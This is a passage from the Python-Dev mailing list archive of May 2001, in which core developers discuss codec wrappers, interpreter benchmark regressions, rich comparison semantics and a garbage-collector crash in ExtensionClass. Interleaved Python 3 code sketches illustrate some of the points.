    at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:3451
#16 0x400194ac in pygobject_register_class (dict=0x81851fc, 
    class_name=0x402a9388 "GdkDragContext", 
    get_type=0x404d5c50 <gdk_drag_context_get_type>, ec=0x402bcc40, 
    bases=0x816fc34) at gobjectmodule.c:202
#17 0x402a55fd in pygtk_register_classes (d=0x81851fc) at gtk.c:31844
#18 0x40257004 in init_gtk () at gtkmodule.c:98

I don't have time to dig deeper into this right now but perhaps
this will help someone.

  Neil


From mal at lemburg.com  Wed May 16 18:24:57 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 18:24:57 +0200
Subject: [Python-Dev] Easy codec access
References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><m31yppo99f.fsf@atrus.jesus.cam.ac.uk><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid>
Message-ID: <3B02A9D9.113836D6@lemburg.com>

Fredrik Lundh wrote:
> 
> skip wrote:
> 
> >     mal> pickle and marshal would also be good to have wrapped as codecs.
> >
> > Why?  They operate on much more than strings.

Of course. 

Still their basic task is to take an object and
encode it in some way for dumps() and do the reverse for loads().
That's pretty much what codecs normally do ;-)

I wasn't referring to the use of pickle and marshal with string.encode()
and .decode(); even though you could then decode a pickle using
"pickledata".decode("pickle") and get back the object.

These two are very useful though when it comes to using codecs
for file wrappers:

f = codecs.open('mypicklfile', mode='wb', encoding='pickle')
f.write((123, 'abc', 456.789))
f.close()

f = codecs.open('mypicklfile', mode='rb', encoding='pickle')
t = f.read()
f.close()
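The standard library does not provide a `pickle` encoding for `codecs.open()`, so the snippet above is a proposal. A Python 3 sketch of the same file-wrapper idea follows, using a hypothetical `PickleStream` class over any binary file object (an in-memory buffer here, so nothing touches disk). As with any use of `pickle`, only read data from trusted sources.

```python
import io
import pickle


class PickleStream:
    """Hypothetical wrapper: write() pickles one object, read() unpickles the next."""

    def __init__(self, fileobj):
        self._f = fileobj

    def write(self, obj):
        pickle.dump(obj, self._f)

    def read(self):
        return pickle.load(self._f)


buf = io.BytesIO()
PickleStream(buf).write((123, 'abc', 456.789))
buf.seek(0)
t = PickleStream(buf).read()
print(t)   # (123, 'abc', 456.789)
```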

> hypergeneralization, of course.
> 
> more candidates:
> 
>     "10".decode("int")
>     "10.0".decode("float")
>     "[1, 2, 3]".decode("list")
>     "readme.txt".decode("file")
>     "SyntaxError".decode("raise")
>     (etc)

You forgot the most important one ;-) ...

	"print 'My first Python program'".decode("python").run()

-- 
Marc-Andre Lemburg


From skip at pobox.com  Wed May 16 19:44:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 12:44:15 -0500
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
References: <3B011CA8.9DDB4FC7@lemburg.com>
	<200105151635.LAA29530@cj20424-a.reston1.va.home.com>
	<m31yppo99f.fsf@atrus.jesus.cam.ac.uk>
	<3B025F26.A625DE02@lemburg.com>
	<15106.36468.62292.611515@beluga.mojam.com>
	<002101c0de19$e7875a90$e46940d5@hagrid>
	<3B02A9D9.113836D6@lemburg.com>
Message-ID: <15106.48239.813965.579600@beluga.mojam.com>

    mal> Still their basic task is to take an object and encode it in some way
    mal> for dumps() and do the reverse for loads().  That's pretty much
    mal> what codecs normally do ;-)

Yes, I see that.  The conceptual problem I have is that in all previous
examples I've seen here they have taken as input and returned as outputs
only strings or unicode objects.

    mal> These two are very useful though when it comes to using codecs
    mal> for file wrappers:

This use I missed.  Thanks for the explanation.

Skip


From mal at lemburg.com  Wed May 16 20:33:44 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 20:33:44 +0200
Subject: [Python-Dev] Performance compares
Message-ID: <3B02C808.E3354D3F@lemburg.com>

After having read a little into the comparison thread, I tried
some performance compares on my own: the one between
the current CVS version and Python 1.5.2.

Both versions were compiled on the same Linux machine, using the
same GCC compiler and optimization settings.

Here are the results from pybench 0.9 and pystone; some of the
figures show quite dramatic slow-downs. I'm not sure where they
result from, but they do concern me a bit, since the upgrade
path from 1.5.2 is probably the most common one to be expected
in user-land.

Since it is possible that these figures result from my specific 
machine setup, I'd like to know what other people see on their
machines.

Thanks.
--

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 3.26
This machine benchmarks at 3067.48 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 4.43
This machine benchmarks at 2257.34 pystones/second

--

PYBENCH 0.9

Benchmark: /home/lemburg/tmp/pybench-cvs-O.pyb (rounds=10, warp=20)

Tests:                              per run    per oper.    diff *)
------------------------------------------------------------------------
          BuiltinFunctionCalls:    1152.60 ms    9.04 us   +64.70%
           BuiltinMethodLookup:     903.90 ms    1.72 us          
                 CompareFloats:     908.30 ms    2.02 us   +40.94%
         CompareFloatsIntegers:    1276.25 ms    2.84 us   +37.15%
               CompareIntegers:    1075.50 ms    1.19 us   +21.09%
                  CompareLongs:     989.40 ms    2.20 us   +47.12%
                CompareStrings:     844.80 ms    2.25 us   +33.99%
                CompareUnicode:    1018.65 ms    2.72 us       n/a
                 ConcatStrings:    1226.30 ms    8.18 us   +92.56%
                 ConcatUnicode:    1575.40 ms   10.50 us       n/a
               CreateInstances:    2094.05 ms   49.86 us  +101.86%
       CreateStringsWithConcat:    1515.75 ms    7.58 us  +111.67%
       CreateUnicodeWithConcat:    1833.85 ms    9.17 us       n/a
                  DictCreation:    2795.30 ms   18.64 us  +203.34%
             DictWithFloatKeys:    2285.70 ms    3.81 us   +18.73%
           DictWithIntegerKeys:    1444.65 ms    2.41 us   +58.53%
            DictWithStringKeys:    1262.60 ms    2.10 us   +52.83%
                      ForLoops:     989.95 ms   99.00 us   -10.01%
                    IfThenElse:    1232.45 ms    1.83 us   +23.25%
                   ListSlicing:     621.40 ms  177.54 us          
                NestedForLoops:     986.60 ms    2.82 us   +52.09%
          NormalClassAttribute:    1231.15 ms    2.05 us   +36.70%
       NormalInstanceAttribute:    1114.15 ms    1.86 us   +27.11%
           PythonFunctionCalls:    1251.25 ms    7.58 us   +46.09%
             PythonMethodCalls:    1034.35 ms   13.79 us   +42.19%
                     Recursion:     922.15 ms   73.77 us   +36.76%
                  SecondImport:    1055.45 ms   42.22 us  +100.47%
           SecondPackageImport:    1061.35 ms   42.45 us   +96.31%
         SecondSubmoduleImport:    1292.35 ms   51.69 us   +77.89%
       SimpleComplexArithmetic:    1748.00 ms    7.95 us  +120.97%
        SimpleDictManipulation:    1172.85 ms    3.91 us   +47.85%
         SimpleFloatArithmetic:     881.25 ms    1.60 us   +12.30%
      SimpleIntFloatArithmetic:     833.80 ms    1.26 us          
       SimpleIntegerArithmetic:     839.00 ms    1.27 us          
        SimpleListManipulation:    1252.60 ms    4.64 us   +69.37%
          SimpleLongArithmetic:    1360.65 ms    8.25 us  +100.43%
                    SmallLists:    2380.05 ms    9.33 us  +116.72%
                   SmallTuples:    1793.80 ms    7.47 us  +101.52%
         SpecialClassAttribute:    1257.35 ms    2.10 us   +37.91%
      SpecialInstanceAttribute:    1340.25 ms    2.23 us   +21.13%
                StringMappings:    1601.50 ms   12.71 us       n/a
              StringPredicates:    1059.70 ms    3.78 us       n/a
                 StringSlicing:    1235.90 ms    7.06 us   +98.32%
                     TryExcept:    1272.55 ms    0.85 us   +28.39%
                TryRaiseExcept:    1383.45 ms   92.23 us   +77.48%
                  TupleSlicing:    1163.05 ms   11.08 us   +75.29%
               UnicodeMappings:    1232.80 ms   68.49 us       n/a
             UnicodePredicates:    1294.95 ms    5.76 us       n/a
             UnicodeProperties:    1410.45 ms    7.05 us       n/a
                UnicodeSlicing:    1296.80 ms    7.41 us       n/a
------------------------------------------------------------------------
            Average round time:   73388.00 ms                  n/a

*) measured against: /home/lemburg/tmp/pybench-1.5.2-O.pyb (rounds=10, warp=20)

(The compares not shown are below noise level (+-10%))

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From tim.one at home.com  Wed May 16 21:07:49 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 15:07:49 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com>

[Tim]
> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

[Guido]
> Unclear what you're asking.  The language doesn't require any
> particular semantics for sequence comparisons, but the language of
> course includes the tuple and list sequence types, and it describes
> (albeit lacking some rigorous detail) what comparisons for those do.

The current

    Tuples and lists are compared lexicographically using comparison
    of corresponding items.

was quite clear in a cmp-only world.  In a richcmp world, "compared
lexicographically" is fuzzy enough that different implementations may do
different things in good faith, competent users may disagree about what it
means in specific cases, and programs may yield different results across
implementations (or random CVS patches <wink>).

> If there are specific lacks of detail, it probably helps to think
> about filling those in.

The *level* of additional detail intended is the cutoff between what's
guaranteed by the language and what's left up to the implementation.

The full truth before was relatively simple.  For a pair x, y of lists or
tuples,

def __cmp__(x, y):  # pretending this is a method on lists and tuples
    i = 0
    while i < len(x) and i < len(y):
        c = cmp(x[i], y[i])
        if c:
            return c
        i += 1
    return cmp(len(x), len(y))

was *almost* the entire tale, incl. that lengths were re-fetched on each
iteration.  What's left unexplained is the treatment of recursive lists, and
so the result of comparing them is a prime suspect for different behavior
across implementations and releases.

In a richcmp world, there are several additional ways in which the above
fails to capture the full truth, and each of those ways is another prime
suspect for surprises.

For example, I believe it's *intended* that:

1. Element comparisons continue to be strictly left-to-right, and
   that no element comparisons are to be performed after the leftmost
   element comparison that settles the issue (if any).

2. tuple/list comparison via == or != must use only == comparison on
   elements, and that implementations are allowed (but not required)
   to skip all element comparisons when == or != comparison is given
   lists/tuples of different sizes.

OTOH, I doubt (but don't know) it's intended that all implementations must
emulate other semantically significant details of the current implementation,
like:

1. <=, <, > and >= comparisons will do at most one element comparison
   that is not an == comparison.

2. Whenever a <, <=, > or >= element comparison is needed, the long-
   winded details of how that works, incl. but not limited to the
   specific "first try ==, then try <, then try >" strategy used to
   simulate a pre-richcmp cmp() when all else fails.

Going back to the original example:

>>> class C:
...     def __lt__(x, y): return 1
...     __eq__ = __lt__
...
>>> a, b = C(), C()
>>> a < b       #1
1
>>> [a] < [b]   #2
0
>>> cmp(a, b)   #3
0
>>> a > b       #4
1
>>> a == b      #5
1
>>> a != b      #6
1
>>>

Which of those results are *required* by the language, and which merely
*allowed*?

+ I believe #1, #4 and #5 are required.

+ I have no idea whether to call it "a bug" if the #2 and/or #3
  and/or #6 results differed, e.g., under Jython, or under
  CPython 2.3.  Indeed, I'm not even sure why #6 returns 1 under
  CPython today, and I've been staring at this a lot lately <wink>
  ... OK, #6 ends up getting resolved by comparing object
  addresses, which leaves "required or not?" fuzzy (i.e., *must*
  it be resolved that way?  or is it implementation-defined?).


From guido at digicool.com  Wed May 16 22:35:46 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 15:35:46 -0500
Subject: [Python-Dev] Rich comparison of lists and tuples
In-Reply-To: Your message of "Wed, 16 May 2001 15:07:49 -0400."
             <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCOEJIKCAA.tim.one@home.com> 
Message-ID: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>

[Subject fixed]

[Tim shows there's a lot left to the imagination when trying to glean
the meaning of list1==list2 using rich comparisons.]

I would like to break this down by defining the mapping between cmp()
and rich comparisons.

I propose:

- If cmp() is requested but not defined, and rich comparisons are
  defined, try ==, <, > in order; if all three yield false, act as if
  rich comparisons were not defined, and use the fallback comparison
  (i.e. by address).

- If a rich comparison is requested but not defined, use cmp() and use
  the obvious mapping.

- Continue to define the comparison of unequal sequences in terms of
  cmp().

- Testing == or != for sequences takes these shortcuts:

  1. if the lengths differ, the sequences differ

  2. compare the elements using == until a false return is found

Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
easily go the extra mile and define != to use only != on the items;
but is this worth the extra complexity?
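
The first bullet of the proposal can be sketched in Python as below.
`synthesized_cmp` is a hypothetical name, and `id()` stands in for
"comparing by address"; the sketch assumes the rich comparison operators are
defined for both operands.

```python
def synthesized_cmp(x, y):
    """Model of cmp() for objects that define only rich comparisons:
    try ==, then <, then >, and fall back to addresses if all are false."""
    if x == y:
        return 0
    if x < y:
        return -1
    if x > y:
        return 1
    # All three were false: act as if rich comparisons were not defined
    # and order by identity, standing in for comparison by address.
    return (id(x) > id(y)) - (id(x) < id(y))
```

With Tim's class `C` from the earlier message, `a == b` is true on the first
try, so this model returns 0, which agrees with result #3.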

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip at pobox.com  Wed May 16 22:37:43 2001
From: skip at pobox.com (skip at pobox.com)
Date: Wed, 16 May 2001 15:37:43 -0500
Subject: [Python-Dev] GC and ExtensionClass
In-Reply-To: <20010516091942.A16455@glacier.fnational.com>
References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de>
	<200105122108.QAA09951@cj20424-a.reston1.va.home.com>
	<200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de>
	<15103.65486.61021.328424@beluga.mojam.com>
	<200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>
	<20010516091942.A16455@glacier.fnational.com>
Message-ID: <15106.58647.495143.164636@beluga.mojam.com>

    Neil> In other words the GC is finding a tuple object that contains an
    Neil> element with a funny looking address (data segment?) and an
    Neil> op_type of NULL. 

Neil,

I'm not sure if the funny looking address is a red herring or the key to the
crime.  I tried running with a breakpoint set in getBaseDictionary.  The
first couple times, the type parameter looked like

    $26 = (PyExtensionClass *) 0x80e7f60
    $27 = {ob_refcnt = 2, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x80d7138 "ExtensionClass", ...}

    $28 = (PyExtensionClass *) 0x80e8060
    $29 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x80d7209 "Base", ...}

The third time it looked like

    $30 = (PyExtensionClass *) 0x4019f120
    $31 = {ob_refcnt = 1, ob_type = 0x80e7f60, ob_size = 0, 
      tp_name = 0x4019dab2 "GObject", ...}

The difference between the first two calls and the third one is that the
first two objects are defined in ExtensionClass.o, which I currently
statically link into the interpreter.  The Gtk/GObject stuff is dynamically
loaded into the running executable, so it's not surprising that it winds up
at a wildly different address than the ExtensionClass stuff.  My current
best guess is that whatever object the tuple is referring to is declared
static in the dynamically loaded Gtk stuff and has no business getting
reclaimed by the collector.  Sounds like a missing Py_INCREF somewhere.

At the earliest point I've been able to check that object so far, its
ob_type field is NULL.

Skip


From cpr at emsoftware.com  Thu May 17 00:24:15 2001
From: cpr at emsoftware.com (Chris Ryland)
Date: Wed, 16 May 2001 18:24:15 -0400
Subject: [Python-Dev] FYI: MIT's dynamic language design panel now online
Message-ID: <00f201c0de57$03042c20$6901a8c0@EM2>

This talk is most entertaining! Highly recommended to you good folk, if only
as a reinforcement of the good design principles embodied in Python (with
the exception of print >> ;-).

Jonathan Rees (an old Scheme/T hand) kept referring to Python whenever he
wanted to give an example of a modern dynamic language (disclaiming a lot of
knowledge about it). He mentioned it three or four times (usually
positively), so it must be on the tip of his mind.
--
Cheers!
Chris Ryland
Em Software, Inc.
www.emsoftware.com


From greg at cosc.canterbury.ac.nz  Thu May 17 03:49:31 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 17 May 2001 13:49:31 +1200 (NZST)
Subject: [Python-Dev] Easy codec access
In-Reply-To: <3B02A9D9.113836D6@lemburg.com>
Message-ID: <200105170149.NAA18480@s454.cosc.canterbury.ac.nz>

"M.-A. Lemburg" <mal at lemburg.com>:

> You forgot the most important one ;-) ...
>
>	"print 'My first Python program'".decode("python").run()

Surely that should be:

   "'My first Python program'.encode('stdout')".decode("python").decode("run")

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From tim.one at home.com  Thu May 17 03:56:56 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 21:56:56 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105160802.f4G821s02180@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>

[Martin v. Loewis]
> I'll put a patch on SF soon which does what you want to do, i.e. tries
> tp_compare as the first thing if tp_richcompare is not there.

Thanks!  I'll check it out.

> Even with this patch, your code is faster if strings have a
> richcompare.

OK, from what I understand, that makes no sense.  Does it to you?  Assuming
you're still talking about my silly little

     "ab" < "cd"

test, then all the new code you put into your richcompare slot was a waste of
cycles for that specific case:  the new richcmp "objects the same type?" test
would fail, then the new "pointers equal?" test would fail, then the new "op
== Py_EQ?" test would fail, and then richcompare would give up and call
string_compare() anyway.  So I'm either missing something fundamental about
what you did, or it's a timing anomaly on your box that defies obvious
explanation ("but if I add three new tests that don't pay off, and make an
extra call, then it's faster!").

> Without richcompare, I get
>
> 0.720
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
> 0.720
> 0.720
> 0.730
>
> With it, I get
>
> 0.710
> 0.720
> 0.720
> 0.710
> 0.710
> 0.720
> 0.710
> 0.710
> 0.710
> 0.720

See above.

> Given that stock CVS python is in the 0.78 range, the difference is
> negligible, though.

Oh, I don't like giving up that easy on things that make no sense --
something else is happening here, although I've no idea what.
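
To put Martin's figures in perspective, here is the arithmetic on the two
quoted runs. The values are copied from the message; the percentage is
relative to the run without a richcompare slot.

```python
from statistics import mean

# Martin's ten timings (seconds) without and with a string richcompare slot.
without_rich = [0.720, 0.720, 0.720, 0.730, 0.720,
                0.720, 0.730, 0.720, 0.720, 0.730]
with_rich = [0.710, 0.720, 0.720, 0.710, 0.710,
             0.720, 0.710, 0.710, 0.710, 0.720]

m_without = mean(without_rich)
m_with = mean(with_rich)
# Relative speedup of the richcompare build over the other one.
speedup_pct = 100.0 * (m_without - m_with) / m_without
print(f"{m_without:.3f} s vs {m_with:.3f} s: {speedup_pct:.2f}% faster")
```

The means are 0.723 s and 0.714 s, about 1.2% apart; the 9 ms gap between
them is below the 10 ms step visible in the individual readings.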


From tim.one at home.com  Thu May 17 04:17:37 2001
From: tim.one at home.com (Tim Peters)
Date: Wed, 16 May 2001 22:17:37 -0400
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com>

[MAL]
> Since it is possible that these figures result from my specific
> machine setup, I'd like to know what other people see on their
> machines.

Is this the same machine where you were able to get 15% difference a few
years ago by adding or removing an unreachable printf in ceval.c (or was that
Vladimir)?  If so, I bet it's degenerated to random 50% difference since then
<wink>.

My Win98SE box is *astonishingly* useless for timings.  Without fail, the
first time I run pystone after a reboot yields a result a solid 50% higher
than the second or subsequent times I run it (yes, it's major-league *slower*
the second time).  This is true across dozens of trials over several months,
and across all versions of Python.

And simple little loops routinely vary in reported runtime by a factor of 3.
I may have to dig my old Win95 box out of the packing crate <0.6 wink>.

None of that changes, of course, that the numbers you got are scary.
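
When timings are this noisy, one common mitigation is to repeat a
measurement several times and keep the fastest run, since interference from
the rest of the system can only make a run slower. It does nothing about a
machine that is consistently slow after a reboot, but it does damp random
variation. A minimal sketch using the standard `timeit` module of modern
Python; the `best_of` helper and its defaults are illustrative choices, and
the strings are bound in `setup` so the comparison is done on variables
rather than literals.

```python
import timeit


def best_of(stmt, setup="pass", repeat=5, number=100_000):
    """Run `stmt` `number` times, `repeat` times over, and return the
    fastest per-execution time in seconds."""
    totals = timeit.repeat(stmt, setup=setup, repeat=repeat, number=number)
    # The minimum is the run least disturbed by other activity.
    return min(totals) / number


if __name__ == "__main__":
    t = best_of("a < b", setup="a, b = 'ab', 'cd'")
    print(f"'ab' < 'cd': {t * 1e9:.1f} ns per comparison")
```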


From jeremy at digicool.com  Thu May 17 00:37:47 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Wed, 16 May 2001 18:37:47 -0400 (EDT)
Subject: [Python-Dev] Performance compares
In-Reply-To: <3B02C808.E3354D3F@lemburg.com>
References: <3B02C808.E3354D3F@lemburg.com>
Message-ID: <15107.315.19349.268345@slothrop.digicool.com>

As usual, the results you're reporting are quite different than what I
see on my machine.  I'd like to think that my machine is more normal
than yours, but I expect we're both oddballs <0.2 wink>.  I see
basically the same slowdowns that you see, but the amount of the
slowdown is quite a bit smaller.

I compared current CVS with 1.5.2, both compiled with GCC 2.95.3 and
the -O3 flag; ran pybench on an 800MHz P3 with 256MB RAM running Linux
2.2.17.

Python 1.5.2:
Pystone(1.1) time for 10000 passes = 0.85
This machine benchmarks at 11764.7 pystones/second

Python CVS:
Pystone(1.1) time for 10000 passes = 0.94
This machine benchmarks at 10638.3 pystones/second
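
Pystone's "pystones/second" figure is the number of passes divided by the
elapsed time, so the two reports above can be checked, and the slowdown
expressed as a percentage, with a few lines of arithmetic:

```python
passes = 10000
# Elapsed seconds for 10000 passes, from the two pystone reports above.
times = {"1.5.2": 0.85, "CVS": 0.94}

for version, seconds in times.items():
    print(f"{version}: {passes / seconds:.1f} pystones/second")

# Relative slowdown of CVS compared with 1.5.2, measured on elapsed time.
slowdown_pct = 100.0 * (times["CVS"] - times["1.5.2"]) / times["1.5.2"]
print(f"CVS takes {slowdown_pct:.1f}% longer")
```

This reproduces the quoted 11764.7 and 10638.3 pystones/second, with CVS
taking roughly 10.6% longer than 1.5.2 on this machine.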

PYBENCH 0.9

Benchmark: cvs (rounds=10, warp=100)

Tests:                              per run    per oper.  diff *
------------------------------------------------------------------------
          BuiltinFunctionCalls:      41.85 ms    1.64 us  +31.40%
                 CompareFloats:      39.60 ms    0.44 us  +13.96%
         CompareFloatsIntegers:
               CompareIntegers:
                  CompareLongs:      39.85 ms    0.44 us  +15.01%
                CompareStrings:
                CompareUnicode:
                 ConcatStrings:      48.65 ms    1.62 us  +46.76%
                 ConcatUnicode:
               CreateInstances:      75.75 ms    9.02 us  +55.54%
       CreateStringsWithConcat:      51.60 ms    1.29 us  +62.78%
       CreateUnicodeWithConcat:
                  DictCreation:      87.80 ms    2.93 us  +115.72%
             DictWithFloatKeys:
           DictWithIntegerKeys:
            DictWithStringKeys:
                      ForLoops:      63.85 ms   31.93 us  -13.60%
                    IfThenElse:
                   ListSlicing:
                NestedForLoops:      32.95 ms    0.66 us  +10.39%
          NormalClassAttribute:
       NormalInstanceAttribute:
           PythonFunctionCalls:      48.85 ms    1.48 us  +11.78%
             PythonMethodCalls:      38.95 ms    2.60 us  +12.09%
                     Recursion:
                  SecondImport:      37.80 ms    7.56 us  +65.79%
           SecondPackageImport:      38.95 ms    7.79 us  +50.68%
         SecondSubmoduleImport:      49.90 ms    9.98 us  +35.05%
       SimpleComplexArithmetic:      58.95 ms    1.34 us  +74.67%
        SimpleDictManipulation:
         SimpleFloatArithmetic:
      SimpleIntFloatArithmetic:
       SimpleIntegerArithmetic:
        SimpleListManipulation:      43.65 ms    0.81 us  +15.63%
          SimpleLongArithmetic:      42.70 ms    1.29 us  +53.32%
                    SmallLists:      79.15 ms    1.55 us  +56.89%
                   SmallTuples:      66.65 ms    1.39 us  +43.03%
         SpecialClassAttribute:
      SpecialInstanceAttribute:
                StringMappings:
              StringPredicates:
                 StringSlicing:      39.00 ms    1.11 us  +28.71%
                     TryExcept:
                TryRaiseExcept:      50.60 ms   16.87 us  +27.46%
                  TupleSlicing:      37.90 ms    1.80 us  +26.54%
               UnicodeMappings:
             UnicodePredicates:
             UnicodeProperties:
                UnicodeSlicing:
------------------------------------------------------------------------
            Average round time:    3177.00 ms                n/a

*) measured against: 1.5.2 (rounds=10, warp=100)

(As MAL did, I removed all the results where the difference is within
+/- 10%.)

i-never-do-simple-complex-arithmetic-anyway-ly yr's,
Jeremy


From martin at loewis.home.cs.tu-berlin.de  Thu May 17 08:12:18 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 08:12:18 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>
Message-ID: <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de>

> OK, from what I understand, that makes no sense.  Does it to you?

After reviewing everything again, I think I now do: In the richcomp
case, I have

			res = (*f1)(v, w, op);
			if (res != Py_NotImplemented)
				return res;

f1 is string_richcompare, so I get 2 function calls inside do_richcmp:
one to string_richcompare, the other one to string_compare, as my
optimizations are not triggered in your example.

If I set tp_richcompare of strings to 0, I get past this code, and do

		c = (*f)(v, w);
		if (PyErr_Occurred())
			return NULL;
		return convert_3way_to_object(op, c);

Here, I get 3 function calls: f is string_compare, then
PyErr_Occurred, finally convert_3way_to_object, which converts
{-1,0,1} x Op -> {Py_True, Py_False}.
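
The mapping `convert_3way_to_object` performs can be modelled in Python as a
table from operator to a test on the three-way result. This is an
illustrative sketch: `convert_3way` and the operator strings are
hypothetical names, and Python's `True`/`False` stand in for
`Py_True`/`Py_False`.

```python
# Each rich comparison operator becomes a test on a cmp()-style result c,
# which is negative, zero or positive.
_FROM_3WAY = {
    "<": lambda c: c < 0,
    "<=": lambda c: c <= 0,
    "==": lambda c: c == 0,
    "!=": lambda c: c != 0,
    ">": lambda c: c > 0,
    ">=": lambda c: c >= 0,
}


def convert_3way(op, c):
    """Model of turning a three-way result and an operator into a bool."""
    return _FROM_3WAY[op](c)
```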

Indeed, when I inline convert_3way_to_object, I get the same speed in
both cases (with the remaining differences attributed to measurement
and gcc doing register usage differently in both functions).

I'd still be in favour of giving strings a richcompare, since it
allows optimizing what I think is the single most frequent case:
Py_EQ on strings. With a control flow like

		if (a->ob_size != b->ob_size)
		    goto False;

		if (a->ob_size == 0)
		    goto True;

		if (a->ob_sval[0] != b->ob_sval[0])
		    goto False;

		if (memcmp(a->ob_sval, b->ob_sval, a->ob_size))
		    goto False;
		else
		    goto True;

we can reduce the number of function calls.
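
The control flow above can be modelled in Python on `bytes` objects as
follows. `bytes_eq_fast` and the `stats` counters are hypothetical, added
only to show how often the full comparison (here `a == b`, standing in for
`memcmp()`) is actually reached.

```python
def bytes_eq_fast(a: bytes, b: bytes, stats: dict) -> bool:
    """Model of an equality fast path: length, emptiness, first byte,
    and only then a full comparison of the buffers."""
    stats["comps"] = stats.get("comps", 0) + 1
    if len(a) != len(b):
        return False              # different sizes: cannot be equal
    if len(a) == 0:
        return True               # both empty
    if a[0] != b[0]:
        return False              # first byte differs
    stats["memcmps"] = stats.get("memcmps", 0) + 1
    return a == b                 # stands in for memcmp() over the buffer
```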

Regards,
Martin


From skip at pobox.com  Thu May 17 08:42:41 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 01:42:41 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
Message-ID: <15107.29409.242342.200378@beluga.mojam.com>

Over the past couple days I've included python-dev on various messages in an
ongoing thread about a segmentation violation I was getting with the new
PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
Schemenauer, I finally know what's going on and I have a simple workaround
that lets me get back to work.  Here's a summary of the problem.

When defining ExtensionClass types, you need to create and initialize a
PyExtensionClass struct.  It looks something like so:

    PyExtensionClass PyGtkTreeSortable_Type = {
	PyObject_HEAD_INIT(NULL)
	0,				/* ob_size */
	"GtkTreeSortable",			/* tp_name */
	sizeof(PyPureMixinObject),	/* tp_basicsize */
	...
    };

Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
normally be the address of a type object (e.g. &PyType_Type).  However, Jim
Fulton pointed out that on Windows you can't get the address of &PyType_Type
object at compile time.  Accordingly, ExtensionClass provides a
PyExtensionClass_Export macro whose responsibility is, in part, to set the
ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
will know why.  I just accept Jim's word as gospel and move on...)

A problem arises if the garbage collector runs while the module
initialization function is running, but before all the ob_type fields have
been assigned their correct values.  In this case, a one-element tuple
representing the bases of a particular PyGtk extension class was traversed
by the garbage collector.

The workaround turns out to be exceedingly simple:

    import gc
    gc.disable()
    import gtk
    gc.enable()

I can handle doing that from Python code for the time being and will leave
it up to others to decide how, if at all, ExtensionClass should be changed
to correct the problem.
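
One caveat with the workaround as written: if `import gtk` raises, the
collector stays disabled. A slightly more defensive sketch wraps the same
two `gc` calls in a context manager that restores the collector's previous
state (`gc_paused` is a hypothetical helper name, and `json` is only a
stand-in for the extension module being imported):

```python
import contextlib
import gc


@contextlib.contextmanager
def gc_paused():
    """Disable the cyclic garbage collector for the duration of a block and
    restore its previous state afterwards, even if the block raises."""
    was_enabled = gc.isenabled()
    gc.disable()
    try:
        yield
    finally:
        if was_enabled:
            gc.enable()


if __name__ == "__main__":
    with gc_paused():
        import json  # stand-in for "import gtk"
    print("gc enabled again:", gc.isenabled())
```

This only hides the symptom; the type objects still need their `ob_type`
fields set before anything can reach them.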

Skip


From martin at loewis.home.cs.tu-berlin.de  Thu May 17 08:41:15 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Thu, 17 May 2001 08:41:15 +0200
Subject: [Python-Dev] Comparison speed
